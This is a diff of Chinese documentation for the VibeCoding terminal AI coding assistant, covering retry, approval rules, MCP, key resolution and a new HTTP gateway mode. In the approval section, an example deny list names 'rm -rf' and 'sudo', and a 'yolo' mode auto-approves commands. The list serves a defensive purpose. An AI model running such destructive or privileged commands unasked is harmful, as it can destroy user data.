+| `maxRetries` | int | `3` | 最大重试次数 |
+| `baseDelayMs` | int | `2000` | 基础延迟 (毫秒)，每次重试翻倍 |
 
 ```json
 {
@@ -398,79 +703,92 @@ API 调用重试配置。
 }
 ```
 
-| 字段 | 类型 | 默认值 | 描述 |
-|------|------|--------|------|
-| `enabled` | bool | true | 是否启用重试 |
-| `maxRetries` | int | 3 | 最大重试次数 |
-| `baseDelayMs` | int | 2000 | 基础延迟 (毫秒) |
+#### 可重试的错误
 
-### approval
+以下错误会触发自动重试：
+
+| 类别 | 示例 |
+|------|------|
+| 速率限制 | HTTP 429 |
+| 服务器错误 | HTTP 502, 503, 504 |
+| 网络错误 | 连接被拒绝、连接重置、DNS 错误 |
+| 超时 | HTTP 客户端超时、TCP 超时 |
 
-Agent 模式审批配置，控制 bash 命令的审批行为。
+以下情况**不会**重试：
+- 上下文取消（用户按了 Ctrl+C）
+- HTTP 4xx 客户端错误（除 429 外）：400、401、403、404
+- 连接成功后流中断的错误
+
+#### 退避策略
+
+每次重试等待 `baseDelayMs × 2^attempt` 毫秒，上限 30 秒：
+
+| 次数 | 延迟 (base=2000ms) |
+|------|--------------------|
+| 第 1 次 | 2 秒 |
+| 第 2 次 | 4 秒 |
+| 第 3 次 | 8 秒 |
+
+发生重试时，VibeCoding 会在 TUI 中显示状态消息：
+```
+Retrying (1/3): request timed out — waiting 2.0s...
+Retrying (2/3): rate limited (HTTP 429) — waiting 4.0s...
+```
+
+#### 禁用重试
 
 ```json
 {
-  "approval": {
-    "bashWhitelist": ["go ", "make ", "git ", "npm ", "yarn "],
-    "bashBlacklist": ["rm -rf", "sudo"]
+  "retry": {
+    "enabled": false
   }
 }
 ```
 
+---
+
+### approval
+
+Agent 模式审批配置。控制哪些 Bash 命令自动执行，哪些需要用户确认。
+
 | 字段 | 类型 | 默认值 | 描述 |
 |------|------|--------|------|
-| `bashWhitelist` | []string | 见下文 | 自动批准的命令前缀列表 |
-| `bashBlacklist` | []string | [] | 始终需要审批的命令前缀列表 |
+| `bashWhitelist` | []string | *(见下文)* | agent 模式下自动批准的命令前缀列表 |
+| `bashBlacklist` | []string | `[]` | **始终**需要审批的命令前缀列表 |
+| `confirmBeforeWrite` | bool | `true` | agent 模式下 `Write`/`Edit` 工具执行前需要用户确认 |
 
 #### 默认白名单
 
 ```json
-[
-  "go ",
-  "make ",
-  "git ",
-  "npm ",
-  "yarn ",
-  "node ",
-  "python ",
-  "pip "
-]
+["go ", "make ", "git ", "npm ", "yarn ", "node ", "python ", "pip "]
 ```
 
 #### 审批流程
 
-- `bashBlacklist` 的优先级高于 `bashWhitelist`
-- 在 `agent` 模式下，命中黑名单的 bash 命令即使同时命中白名单，仍然必须审批
-- 在 `yolo` 模式下，命中黑名单的 bash 命令仍然需要审批
-- 在 `--print` 模式下，凡是本应触发审批的命令都会直接报错退出，不会自动批准
-
-```
-┌─────────────────────────────────────────────────────────────┐
-│                    Approval Flow                             │
-├─────────────────────────────────────────────────────────────┤
-│                                                              │
-│  Agent 请求执行 bash 命令                                    │
-│  │                                                           │
-│  ▼                                                           │
-│  检查模式                                                    │
-│  ├─ Plan 模式 → 拒绝 (只读)                                  │
-│  ├─ Agent 模式 → 继续检查                                    │
-│  └─ YOLO 模式 → 自动批准（除非命中黑名单）                   │
-│                                                              │
-│  黑名单检查（最高优先级）                                    │
-│  ├─ 命令匹配黑名单 → 需要用户审批                            │
-│  └─ 否则继续                                                 │
-│                                                              │
-│  Agent 模式下:                                               │
-│  ├─ 非 bash 工具 → 自动批准                                  │
-│  ├─ 命令匹配白名单 → 自动批准                                │
-│  └─ 其他 → 需要用户审批                                      │
-│                                                              │
-│  用户审批:                                                   │
-│  ├─ 输入 y/yes → 执行命令                                    │
-│  └─ 输入 n/no → 拒绝执行                                     │
-│                                                              │
-└─────────────────────────────────────────────────────────────┘
+```
+Agent 请求执行工具
+│
+▼
+检查模式
+├─ Plan 模式 → 拒绝 (只读)
+├─ Agent 模式 → 继续检查
+└─ YOLO 模式 → 自动批准（除非命中黑名单）
+│
+▼
+黑名单检查（最高优先级）：
+├─ 命令匹配黑名单 → 需要用户审批
+└─ 否则继续
+│
+▼
+Agent 模式下：
+├─ Write/Edit 工具 + confirmBeforeWrite=true → 需要用户审批
+├─ 非 Bash 工具 → 自动批准
+├─ 命令匹配白名单 → 自动批准
+└─ 其他 → 需要用户审批
+│
+▼
+在 --print 模式下：
+  本应触发审批的命令 → 直接报错退出
 ```
 
 #### 示例配置
@@ -494,17 +812,161 @@ Agent 模式审批配置，控制 bash 命令的审批行为。
 }
 ```
 
+**禁用写入确认 (信任 agent):**
+```json
+{
+  "approval": {
+    "confirmBeforeWrite": false
+  }
+}
+```
+
+---
+
+## MCP 配置
+
+MCP 服务器配置保存在独立的 `mcp.json` 文件中，不写入 `settings.json`。
+
+VibeCoding 启动时会从以下位置加载 MCP 配置：
+
+1. 全局配置：Linux/macOS 为 `~/.vibecoding/mcp.json`，Windows 为 `%APPDATA%\vibecoding\mcp.json`
+2. 项目配置：`.vibe/mcp.json`
+
+可在 TUI 中创建模板：
+
+```text
+/init_mcp project full
+/init_mcp global basic
+/mcps
+```
+
+示例：
+
+```json
+{
+  "mcpServers": [
+    {
+      "name": "local-tools",
+      "type": "stdio",
+      "command": "/absolute/path/to/mcp-server",
+      "args": ["--port", "8080"],
+      "env": [
+        {"name": "API_KEY", "value": "sk-..."}
+      ]
+    },
+    {
+      "name": "remote-tools",
+      "type": "http",
+      "url": "https://mcp.example.com",
+      "headers": [
+        {"name": "Authorization", "value": "Bearer token"}
+      ]
+    }
+  ]
+}
+```
+
+支持的传输类型：
+
+- `stdio`：要求 `command` 为绝对路径
+- `http`：通过 `url` 连接 streamable HTTP 端点
+- `sse`：通过 `url` 连接 legacy SSE 流，并通过 `messageUrl` 发送请求
+
+MCP 工具会在内置工具和 `skill_ref` 之后、agent 创建之前注册。agent 会冻结当前会话的 system prompt 和工具定义，因此修改 `mcp.json` 后需要重启客户端才会生效。
+
+工具名称采用 `mcp_<server_name>_<tool_name>`。如果名称冲突，VibeCoding 会追加数字后缀，不会覆盖已有工具。自动启动加载会忽略 starter 模板里的占位项，例如 `/absolute/path/to/mcp-server`、`example.com` 和 `replace-me`。
+
+---
+
 ## 认证配置
 
-### 方式一: 环境变量
+VibeCoding 支持多种方式提供 API 密钥，解析逻辑灵活。
+
+### 密钥解析顺序
+
+VibeCoding 需要某个提供商的 API 密钥时，按以下顺序查找：
+
+1. **提供商 `apiKey` 字段** — 如果在 `settings.json` 中设置了，按下方规则解析
+2. **派生的环境变量** — 将提供商名称转换为环境变量：例如 `deepseek-openai` → `DEEPSEEK_OPENAI_API_KEY`
+
+### apiKey 字段格式
+
+`apiKey` 字段支持三种格式：
+
+| 格式 | 示例 | 行为 |
+|------|------|------|
+| `${VAR}` | `"${DEEPSEEK_API_KEY}"` | 读取环境变量 `VAR` 的值 |
+| `!command` | `"!pass show deepseek-key"` | 仅当 `VIBECODING_ALLOW_SHELL_CONFIG=1` 时执行 shell 命令，并使用其标准输出 |
+| 纯字符串 | `"sk-abc123..."` | 直接使用 (⚠️ 不建议用于共享配置) |
+
+#### 环境变量引用
+
+```json
+{
+  "providers": {
+    "deepseek-openai": {
+      "apiKey": "${DEEPSEEK_API_KEY}"
+    }
+  }
+}
+```
+
+然后设置环境变量：
+
+```bash
+export DEEPSEEK_API_KEY=sk-...
+```
+
+#### Shell 命令 (密码管理器集成)
+
+前缀加 `!` 可执行 shell 命令。VibeCoding 在 Linux/macOS 上使用 `sh -c`，在 Windows 上使用 `powershell.exe`。
+
+Shell 命令解析默认关闭。如需在可信本地配置中启用，设置：
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "apiKey": "!pass show api/anthropic"
+    },
+    "openai": {
+      "apiKey": "!security find-generic-password -s openai-api -w"
+    }
+  }
+}
+```
+
+适用于集成 `pass`、`1password-cli`、macOS 钥匙串或其他密钥管理工具。
+
+#### 派生环境变量回退
+
+如果某个提供商未配置 `apiKey`，VibeCoding 会从提供商名称派生环境变量名：
+
+| 提供商名称 | 派生的环境变量 |
+|-----------|---------------|
+| `deepseek-openai` | `DEEPSEEK_OPENAI_API_KEY` |
+| `deepseek-anthropic` | `DEEPSEEK_ANTHROPIC_API_KEY` |
+| `my-custom-provider` | `MY_CUSTOM_PROVIDER_API_KEY` |
+| `anthropic` | `ANTHROPIC_API_KEY` |
+| `openai` | `OPENAI_API_KEY` |
+
+规则：`-` 替换为 `_`，全部大写，末尾追加 `_API_KEY`。
+
+### 认证示例
+
+**方式一：环境变量 (最简单)**
 
 ```bash
 export DEEPSEEK_API_KEY=sk-...
 ```
 
-### 方式二: 配置文件内嵌
+使用默认配置时，VibeCoding 会为 `deepseek-openai` 提供商查找 `DEEPSEEK_OPENAI_API_KEY`。但如果提供商的 `apiKey` 设置为 `${DEEPSEEK_API_KEY}`，则读取该环境变量。
 
-在 `settings.json` 的 providers 中直接配置:
+**方式二：配置文件内嵌**
 
 ```json
 {
@@ -516,26 +978,41 @@ export DEEPSEEK_API_KEY=sk-...
 }
 ```
 
-### 密钥解析顺序
+**方式三：密码管理器**
 
-1. 环境变量 (`DEEPSEEK_API_KEY`)
-2. 配置文件内嵌 (`settings.json` providers.<name>.apiKey)
+```json
+{
+  "providers": {
+    "deepseek-openai": {
+      "apiKey": "!pass show deepseek"
+    }
+  }
+}
+```
+
+---
 
 ## 环境变量覆盖
 
-可以通过环境变量覆盖任何设置:
+以下环境变量在运行时覆盖设置：
+
+| 环境变量 | 覆盖的设置 | 示例 |
+|---------|-----------|------|
+| `VIBECODING_DIR` | 全局配置目录 | `export VIBECODING_DIR=/custom/config` |
+| `VIBECODING_PROVIDER` | `defaultProvider` | `export VIBECODING_PROVIDER=anthropic` |
+| `VIBECODING_MODEL` | `defaultModel` | `export VIBECODING_MODEL=claude-sonnet-4-20250514` |
+| `VIBECODING_MODE` | `defaultMode` | `export VIBECODING_MODE=yolo` |
+| `VIBECODING_THINKING` | `defaultThinkingLevel` | `export VIBECODING_THINKING=high` |
+| `VIBECODING_DEBUG` | 启用 provider 级请求/响应调试输出 | `export VIBECODING_DEBUG=1` |
 
-| `VIBECODING_DIR` | 配置目录 |
-| `VIBECODING_PROVIDER` | defaultProvider |
-| `VIBECODING_MODEL` | defaultModel |
-| `VIBECODING_MODE` | defaultMode |
-| `VIBECODING_THINKING` | defaultThinkingLevel |
-| `VIBECODING_DEBUG` | provider 级请求/响应调试输出 |
+---
 
 ## 配置示例
 
 ### 最小配置
 
+只需设置默认提供商和模型，其余使用合理的默认值。
+
 ```json
 {
   "defaultProvider": "deepseek-openai",
@@ -545,16 +1022,38 @@ export DEEPSEEK_API_KEY=sk-...
 
 ### 多提供商配置
 
+可在运行时通过 `/provider` 或 `--provider` 切换提供商：
+
 ```json
 {
   "providers": {
     "deepseek-anthropic": {
+      "vendor": "deepseek",
       "baseUrl": "https://api.deepseek.com/anthropic",
+      "apiKey": "${DEEPSEEK_API_KEY}",
       "api": "anthropic-messages"
     },
     "deepseek-openai": {
+      "vendor": "deepseek",
       "baseUrl": "https://api.deepseek.com",
+      "apiKey": "${DEEPSEEK_API_KEY}",
       "api": "openai-chat"
+    },
+    "anthropic": {
+      "vendor": "anthropic",
+      "baseUrl": "https://api.anthropic.com",
+      "apiKey": "${ANTHROPIC_API_KEY}",
+      "api": "anthropic-messages",
+      "cacheControl": true,
+      "models": [
+        {
+          "id": "claude-sonnet-4-20250514",
+          "name": "Claude Sonnet 4",
+          "contextWindow": 200000,
+          "maxTokens": 8192,
+          "cost": { "input": 3, "output": 15, "cacheRead": 0.3, "cacheWrite": 3.75 }
+        }
+      ]
     }
   },
   "defaultProvider": "deepseek-openai",
@@ -562,7 +1061,9 @@ export DEEPSEEK_API_KEY=sk-...
 }
 ```
 
-### 自定义 API 端点
+### 自定义 API 端点 / HTTP 代理
+
+`baseUrl` 指向 API 端点或 API 网关；`httpProxy` 只配置该 provider 的网络代理。`httpProxy` 为空时，会保留 Go 默认的 `HTTP_PROXY` / `HTTPS_PROXY` 环境变量行为。
 
 ```json
 {
@@ -570,26 +1071,67 @@ export DEEPSEEK_API_KEY=sk-...
     "my-proxy": {
       "baseUrl": "https://my-proxy.example.com/v1",
       "api": "openai-chat",
-      "apiKey": "my-key",
+      "apiKey": "${MY_PROXY_API_KEY}",
+      "httpProxy": "http://127.0.0.1:7890",
       "models": [
         {
-          "id": "deepseek-v4-flash",
-          "name": "DeepSeek-V4-Flash (via proxy)"
+          "id": "gpt-4o",
+          "name": "GPT-4o (via proxy)",
+          "contextWindow": 128000,
+          "maxTokens": 16384
         }
       ]
     }
   },
-  "defaultProvider": "my-proxy"
+  "defaultProvider": "my-proxy",
+  "defaultModel": "gpt-4o"
 }
 ```
 
-### 启用沙箱
+### 启用沙箱并自定义路径
 
 ```json
 {
   "sandbox": {
     "enabled": true,
-    "level": "standard"
+    "level": "standard",
+    "allowNetwork": false,
+    "allowedRead": ["/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc/ssl", "/opt/go"],
+    "passEnv": ["PATH", "HOME", "USER", "LANG", "TERM", "SHELL", "GOPATH", "GOROOT"],
+    "tmpSize": "200m"
+  }
+}
+```
+
+### 为长会话启用空闲压缩
+
+```json
+{
+  "compaction": {
+    "enabled": true,
+    "reserveTokens": 16384,
+    "keepRecentTokens": 20000,
+    "idleCompressionEnabled": true,
+    "idleTimeoutSeconds": 60,
+    "idleMinTokensForCompress": 100000
   }
 }
 ```
+
+### 项目级覆盖
+
+放在 `.vibe/settings.json` 中可覆盖特定项目的设置：
+
+```json
+{
+  "defaultMode": "yolo",
+  "defaultThinkingLevel": "high",
+  "shellCommandPrefix": "source .venv/bin/activate && ",
+  "approval": {
+    "bashWhitelist": ["python ", "pytest ", "pip ", "make "],
+    "confirmBeforeWrite": false
+  }
+}
+```
+
+这会与全局设置合并 — 只有你指定的字段会被覆盖。
diff --git a/docs/zh/development.md b/docs/zh/development.md
index 36156b9..fe090aa 100644
--- a/docs/zh/development.md
+++ b/docs/zh/development.md
@@ -207,72 +207,41 @@ func TestMyTool_Execute(t *testing.T) {
 }
 ```
 
-## 添加新 Provider
+## 添加 Provider 支持
 
-### 步骤 1: 创建 Provider 目录
+大多数新服务应作为厂商适配器接入，而不是新增协议 provider。如果服务兼容 OpenAI Chat Completions 或 Anthropic Messages，应复用通用 provider，并在 `internal/provider` 中注册厂商默认值。
 
-```bash
-mkdir -p internal/provider/myprovider
-```
+### 添加 OpenAI/Anthropic 兼容厂商
 
-### 步骤 2: 实现 Provider 接口
+1. 创建 `internal/provider/vendor_myvendor.go`。
+2. 使用 `RegisterVendorAdapter` 注册 URL 识别和默认值。
+3. 只有当模型行为与通用协议不一致时，才增加模型 `compat` 标志。
+4. 在 `internal/provider` 添加聚焦测试；如果请求格式变化，再补 `internal/provider/openai` 或 `internal/provider/anthropic` 测试。
 
 ```go
-// internal/provider/myprovider/provider.go
-package myprovider
-
-import (
-    "context"
-    "github.com/startvibecoding/vibecoding/internal/provider"
-)
-
-type MyProvider struct {
-    apiKey  string
-    baseURL string
-}
-
-func NewProvider(apiKey, baseURL string) *MyProvider {
-    return &MyProvider{apiKey: apiKey, baseURL: baseURL}
-}
-
-func (p *MyProvider) Name() string {
-    return "myprovider"
-}
-
-func (p *MyProvider) Models() []*provider.Model {
-    return []*provider.Model{
-        {ID: "model-1", Name: "Model 1"},
-    }
-}
-
-func (p *MyProvider) GetModel(id string) *provider.Model {
-    for _, m := range p.Models() {
-        if m.ID == id {
-            return m
-        }
-    }
-    return nil
-}
-
-func (p *MyProvider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
-    ch := make(chan provider.StreamEvent)
-    go func() {
-        defer close(ch)
-        // 实现流式调用
-    }()
-    return ch
+package provider
+
+func init() {
+    RegisterVendorAdapter(simpleVendorAdapter{
+        name:           "myvendor",
+        domains:        []string{"api.myvendor.example"},
+        thinkingFormat: "deepseek", // 可选
+        defaultAPI:     "openai-chat",
+    })
 }
 ```
 
-### 步骤 3: 注册 Provider
+CLI 和 ACP 的 provider 创建统一走 `internal/provider/factory`，不要在 `cmd/vibecoding/main.go` 或 `internal/acp/acp.go` 中添加厂商专用创建逻辑。
 
-在 `cmd/vibecoding/main.go` 的 `createProvider()` 函数中添加:
+### 添加新的协议 Provider
 
-```go
-case "myprovider":
-    apiKey := settings.ResolveKey(providerName)
-    p = myprovider.NewProvider(apiKey, pc.BaseURL)
-```
+只有当服务使用 OpenAI Chat Completions / Anthropic Messages 之外的原生协议时，才新增 provider 包。
+
+1. 创建 `internal/provider/myprotocol`。
+2. 实现 `provider.Provider`。
+3. 在 `internal/provider/factory` 增加创建逻辑。
+4. 保持 settings JSON 兼容。
+5. 添加 provider 和 factory 测试。
 
 ## 测试
 
diff --git a/docs/zh/faq.md b/docs/zh/faq.md
index 3a8991f..1404ee2 100644
--- a/docs/zh/faq.md
+++ b/docs/zh/faq.md
@@ -4,7 +4,7 @@
 
 ### Q: VibeCoding 是什么?
 
-A: VibeCoding 是一个终端 AI 编码助手，支持 DeepSeek（默认）、OpenAI、Anthropic 以及任何通过 OpenAI/Anthropic 兼容协议的自定义 API，提供代码编写、调试、重构等功能。
+A: VibeCoding 是一个终端 AI 编码助手，支持 DeepSeek（默认）、OpenAI、Anthropic、面向兼容 API 的厂商适配器，以及通过通用 OpenAI/Anthropic 格式接入的自定义端点，提供代码编写、调试、重构、多 Agent 委托工作流等功能。
 
 ### Q: 支持哪些 LLM?
 
@@ -12,8 +12,8 @@ A:
 - DeepSeek (默认): deepseek-v4-flash, deepseek-v4-pro (1M 上下文，最多 384K 输出)
 - OpenAI: GPT-4o, o1 等
 - Anthropic: Claude Sonnet, Opus 等
-- 小米: MiMo 模型（通过 OpenAI 兼容 API）
-- 自定义: 任何 OpenAI-Chat 或 Anthropic-Messages 兼容 API 端点
+- 厂商适配器: Google Gemini、Google Vertex、小米、Kimi、MiniMax、Seed、Qianfan、Bailian、Gitee、OpenRouter、Together、Groq、Fireworks 等
+- 自定义: 任何 OpenAI Chat 或 Anthropic Messages 兼容 API 端点，会回退到通用 provider
 
 ### Q: 如何安装?
 
@@ -57,6 +57,7 @@ A: 在 `settings.json` 中配置:
 {
   "providers": {
     "deepseek-openai": {
+      "vendor": "deepseek",
       "baseUrl": "https://api.deepseek.com",
       "api": "openai-chat",
       "apiKey": "sk-..."
@@ -254,7 +255,7 @@ A:
 
 ### Q: 有哪些可用工具?
 
-A: VibeCoding 有 7 个内置工具：
+A: VibeCoding 包含核心内置工具，以及可选的多 Agent 工具：
 - `read`: 读取文件内容（包括图像）
 - `write`: 创建/覆盖文件
 - `edit`: 精确文本替换
@@ -262,9 +263,22 @@ A: VibeCoding 有 7 个内置工具：
 - `grep`: 正则内容搜索
 - `find`: 文件名搜索
 - `ls`: 目录列表
+- `plan`: 发布可见任务计划和状态更新
+- `subagent_*`: 使用 `--multi-agent` 启动时委托任务给子 Agent
 
 详见 [工具系统](tools.md) 文档。
 
+### Q: 如何使用多 Agent 工作流?
+
+A: 使用 `--multi-agent` 启动 VibeCoding：
+
+```bash
+vibecoding --multi-agent
+vibecoding acp --multi-agent
+```
+
+这会注册 `subagent_*` 工具用于委托工作。Cron 命令入口也依赖多 Agent 模式。
+
 ### Q: VibeCoding 能读取图像吗?
 
 A: 可以！`read` 工具支持 PNG、JPEG、GIF 和 WebP 图像。图像以 base64 编码发送给 LLM 进行分析。
@@ -335,4 +349,4 @@ A: MIT License
 
 ### Q: 当前版本是什么?
 
-A: 当前版本是 v0.1.9。详见 [更新日志](changelog.md) 了解版本历史。
+A: 当前版本是 v0.1.25。详见 [更新日志](changelog.md) 了解版本历史。
diff --git a/docs/zh/gateway.md b/docs/zh/gateway.md
new file mode 100644
index 0000000..d0f19b5
--- /dev/null
+++ b/docs/zh/gateway.md
@@ -0,0 +1,339 @@
+# Gateway 模式
+
+## 概述
+
+Gateway 模式将 VibeCoding 作为 HTTP 服务运行，对外暴露**标准 OpenAI Chat Completions API**。任何兼容 OpenAI 的客户端 — Cursor、Continue、Open WebUI、Python SDK、自定义脚本 — 都可以直接接入，VibeCoding agent 在后台透明地执行工具调用。
+
+```bash
+vibecoding gateway
+```
+
+## 快速开始
+
+```bash
+# 生成配置模板
+vibecoding --init-gateway
+
+# 启动 gateway（默认 :8080）
+vibecoding gateway
+
+# 测试
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "列出当前目录的文件"}],
+    "stream": false
+  }'
+```
+
+## 命令行参数
+
+| 参数 | 说明 |
+|------|------|
+| `--port` | 监听端口（默认：配置文件或 8080） |
+| `--config` | gateway.json 路径 |
+| `--work-dir` | 默认工作目录 |
+| `--provider` / `-p` | 覆盖 provider |
+| `--model` / `-m` | 覆盖 model |
+| `--sandbox` | 启用沙箱（bwrap） |
+| `--multi-agent` | 启用子 Agent 工具 |
+| `--verbose` | 详细输出 |
+| `--debug` | 调试日志 |
+
+## 配置
+
+Gateway 使用独立的配置文件 `gateway.json`，与 `settings.json` 分开。
+
+**配置加载优先级**（从高到低）：
+
+1. CLI `--config /path/to/gateway.json`
+2. `.vibe/gateway.json`（项目级）
+3. `~/.vibecoding/gateway.json`（全局）
+
+生成配置模板：
+
+```bash
+vibecoding --init-gateway
+vibecoding --init-gateway --force  # 强制覆盖
+```
+
+### 完整配置参考
+
+```jsonc
+{
+  "listen": ":8080",
+
+  "auth": {
+    "enabled": false,
+    "tokens": ["sk-your-secret-token"]
+  },
+
+  "defaultMode": "yolo",
+  "defaultThinkingLevel": "medium",
+  "enableSubAgents": false,
+
+  "sandbox": {
+    "enabled": false,
+    "level": ""       // "none", "standard", "strict"；空 = 根据 mode 自动推导
+  },
+
+  "workingDir": "/home/user/projects",
+
+  "allowedWorkDirs": [
+    "/home/user/projects",
+    "/opt/repos"
+  ],
+
+  "session": {
+    "idleTimeoutSeconds": 1800,
+    "maxSessions": 0
+  },
+
+  "toolVisibility": {
+    "mode": "content",      // "content", "sse_event", "none"
+    "detail": "collapsed"   // "collapsed", "expanded"
+  },
+
+  "systemPromptMode": "append",   // "append", "ignore"
+  "requestTimeoutSeconds": 1800,
+  "maxConcurrentRequests": 0,
+
+  "cors": {
+    "enabled": false,
+    "allowOrigins": ["*"]
+  },
+
+  "provider": "",
+  "model": "",
+  "logLevel": "info"
+}
+```
+
+如果 Gateway 监听在非 loopback 地址、默认模式为 `yolo` 且未启用认证，启动时会输出警告。对外部署时应启用 `auth.enabled`、限制 `allowedWorkDirs`，并考虑启用 sandbox。
+
+## API 端点
+
+### POST /v1/chat/completions
+
+标准 OpenAI Chat Completions API，支持流式和非流式。
+
+**请求：**
+
+```json
+{
+  "model": "deepseek-v4-flash",
+  "messages": [
+    {"role": "system", "content": "你是一个编程助手。"},
+    {"role": "user", "content": "读取 main.go 并解释。"}
+  ],
+  "stream": true,
+  "max_tokens": 4096,
+  "x_session_id": "my-session",
+  "x_mode": "yolo",
+  "x_working_dir": "/home/user/project"
+}
+```
+
+扩展字段（`x_*`）为可选：
+
+| 字段 | 说明 |
+|------|------|
+| `x_session_id` | 关联已有 session（省略则新建） |
+| `x_mode` | 覆盖本次请求的 mode |
+| `x_working_dir` | 覆盖工作目录（需通过 `allowedWorkDirs` 校验） |
+
+**非流式响应：**
+
+```json
+{
+  "id": "chatcmpl-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [{
+    "index": 0,
+    "message": {"role": "assistant", "content": "以下是代码解释..."},
+    "finish_reason": "stop"
+  }],
+  "usage": {"prompt_tokens": 100, "completion_tokens": 200, "total_tokens": 300},
+  "x_session_id": "my-session",
+  "x_tool_calls": [
+    {"name": "read", "args": {"path": "main.go"}, "status": "completed"}
+  ]
+}
+```
+
+**流式响应**使用标准 SSE 格式，以 `data:` 行发送，`[DONE]` 结束。
+
+### GET /v1/models
+
+返回可用模型列表。
+
+### GET /health
+
+健康检查（无需认证）。
+
+```json
+{"status": "ok", "version": "v0.1.26", "sessions": 3}
+```
+
+## 斜杠指令
+
+当最后一条用户消息以 `/` 开头时，在 gateway 层直接处理，不调用 LLM。
+
+| 指令 | 说明 |
+|------|------|
+| `/clear` | 清空 session 上下文 |
+| `/mode [plan\|agent\|yolo]` | 查看或切换模式 |
+| `/model [model_id]` | 查看或切换模型 |
+| `/models` | 列出可用模型 |
+| `/sessions` | 列出活跃 session |
+| `/sessions del <id>` | 删除 session |
+| `/compact` | 触发上下文压缩 |
+| `/status` | 查看 session 状态 |
+| `/skill <name>` | 激活 skill |
+| `/skills` | 列出可用 skills |
+| `/help` | 显示所有指令 |
+
+指令返回标准 OpenAI 响应格式，`stream: true` 和 `stream: false` 均支持。
+
+## 工具可见性
+
+控制工具执行在响应内容中的展示方式。
+
+### mode
+
+| `toolVisibility.mode` | 行为 |
+|------------------------|------|
+| `content`（默认） | 工具输出混入 content 流 |
+| `sse_event` | 工具输出通过独立的 `event: tool_status` SSE 事件发送 |
+| `none` | 不发送任何工具输出，客户端只见最终文本 |
+
+### detail
+
+| `toolVisibility.detail` | 行为 |
+|--------------------------|------|
+| `collapsed`（默认） | 一行摘要：`🔧 read: main.go ✅` |
+| `expanded` | 完整输出，用代码块包裹并自动检测语言 |
+
+**折叠模式**（默认）：大部分工具显示一行摘要。`edit`/`write` 有 diff 时始终展示 diff。错误始终完整展示。
+
+**展开模式**：工具结果用 fenced code block 包裹，自动检测语言（`.go` → `go`，`.py` → `python`，bash 输出 → `bash`，diff → `diff`）。
+
+## 多 Session
+
+每个请求可通过 `x_session_id` 关联 session。Session 维护独立的 agent 状态、消息历史和工具。
+
+- 无 `x_session_id` → 每请求新建 session（无状态）
+- 有 `x_session_id` → 多轮对话（有状态）
+- Session 超过 `idleTimeoutSeconds` 自动过期
+- 同一 session 内的请求串行处理
+
+## 认证
+
+设置 `auth.enabled: true` 并配置 `auth.tokens`：
+
+```json
+{
+  "auth": {
+    "enabled": true,
+    "tokens": ["sk-token-1", "sk-token-2"]
+  }
+}
+```
+
+客户端发送：`Authorization: Bearer sk-token-1`
+
+`/health` 端点始终不需要认证。
+
+## CORS
+
+启用 CORS 后，Gateway 只返回一个 `Access-Control-Allow-Origin` 值：
+
+- `allowOrigins: ["*"]` 允许任意 origin
+- 否则请求的 `Origin` 必须与配置中的某个 origin 完全匹配
+- 如果请求没有 `Origin` header，且只配置了一个 origin，则返回该 origin
+
+## 安全
+
+三层独立防护：
+
+| 层次 | 机制 | 作用 |
+|------|------|------|
+| L1 | Bearer Token | 阻止未授权访问 |
+| L2 | `allowedWorkDirs` | 限制文件系统操作范围 |
+| L3 | Sandbox (bwrap) | OS 级隔离 |
+
+### allowedWorkDirs
+
+控制 `x_working_dir` 可切换到哪些目录：
+
+- 未设置（`null`）→ 不限制
+- 空 `[]` → 禁止所有切换，只能用 `workingDir`
+- 目录列表 → 路径感知匹配（包含路径分隔符边界）
+
+`workingDir` 本身始终被信任（管理员配置的值）。
+
+## 客户端示例
+
+### Python OpenAI SDK
+
+```python
+from openai import OpenAI
+
+client = OpenAI(
+    base_url="http://localhost:8080/v1",
+    api_key="sk-my-token",  # 如果开启了认证
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[
+        {"role": "user", "content": "读取 main.go 并解释架构。"},
+    ],
+    stream=True,
+)
+
+for chunk in response:
+    if chunk.choices[0].delta.content:
+        print(chunk.choices[0].delta.content, end="")
+```
+
+### 多轮对话（带 session）
+
+```python
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "读取 main.go"}],
+    extra_body={"x_session_id": "my-session"},
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "重构错误处理"}],
+    extra_body={"x_session_id": "my-session"},
+)
+```
+
+### curl
+
+```bash
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer sk-my-token" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "解释 main.go"}],
+    "stream": true
+  }'
+```
+
+## System Prompt 处理
+
+| `systemPromptMode` | 行为 |
+|---------------------|------|
+| `append`（默认） | 客户端 system message 追加到内置 system prompt 末尾 |
+| `ignore` | 忽略客户端 system message |
+
+内置 system prompt 包含工具定义、模式指令和上下文文件。`append` 模式保留所有内置内容，同时接受客户端自定义指令。
diff --git a/docs/zh/getting-started.md b/docs/zh/getting-started.md
index c3377e1..6848bb1 100644
--- a/docs/zh/getting-started.md
+++ b/docs/zh/getting-started.md
@@ -88,12 +88,17 @@ export DEEPSEEK_API_KEY=sk-...
 ```json
 {
   "providers": {
-    "deepseek-openai": { "apiKey": "sk-..." }
+    "deepseek-openai": {
+      "vendor": "deepseek",
+      "api": "openai-chat",
+      "baseUrl": "https://api.deepseek.com",
+      "apiKey": "sk-..."
+    }
   }
 }
 ```
 
-详见 [配置详解](configuration.md)。
+可选的 `vendor` 字段用于选择厂商适配器。未设置时，VibeCoding 会尽量根据 `baseUrl` 自动识别厂商，否则根据 `api` 回退到通用协议 provider。详见 [配置详解](configuration.md)。
 
 ## 首次运行
 
@@ -127,6 +132,30 @@ vibecoding --provider deepseek-openai --model deepseek-v4-flash
 vibecoding --provider deepseek-openai --model deepseek-v4-pro
 ```
 
+### 多 Agent 模式
+
+```bash
+# 启用子 Agent 工具和多 Agent 命令
+vibecoding --multi-agent
+
+# ACP 会话也可以启用
+vibecoding acp --multi-agent
+```
+
